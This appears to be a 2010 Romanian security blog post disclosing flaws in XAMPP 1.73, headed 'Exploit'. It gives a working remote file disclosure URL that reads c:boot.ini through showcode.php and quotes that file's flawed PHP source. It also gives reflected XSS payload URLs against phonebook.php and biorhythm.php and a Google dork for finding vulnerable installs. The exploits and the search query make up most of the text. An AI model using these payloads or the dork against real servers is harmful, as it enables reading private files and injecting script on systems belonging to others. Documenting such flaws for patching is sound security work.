Vulnerabilitati multiple XAMPP 1.73 - Securitatea Informatica

Vulnerabilitati multiple XAMPP 1.73

Data:
31/10/2010

Exploit:
Remote file disclosure
XAMPP 1.73 este vulnerabil la un atac de tip remote file disclosure.

http://[host]/xampp/showcode.php/c:boot.ini?showcode=1

showcode.php:

<?php
   echo '<br><br>';
   if ($_REQUEST['showcode'] != 1) {
   echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
   } else {
       $file = file_get_contents(basename($_SERVER['PHP_SELF']));
       echo "<h2>".$TEXT['global-sourcecode']."</h2>";
       echo "<textarea cols='100' rows='10'>";
       echo htmlspecialchars($file);
       echo "</textarea>";
   }
?>

Problema: showcode.php se bazeaza pe basename($_SERVER['PHP_SELF']) pentru a intoarce calea.

Cross Site Scripting


http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>

http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>

Google Hack
inurl:xampp/biorhythm.php

Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro